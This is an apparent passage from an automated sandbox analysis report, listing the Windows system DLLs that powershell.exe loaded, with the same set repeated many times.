                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
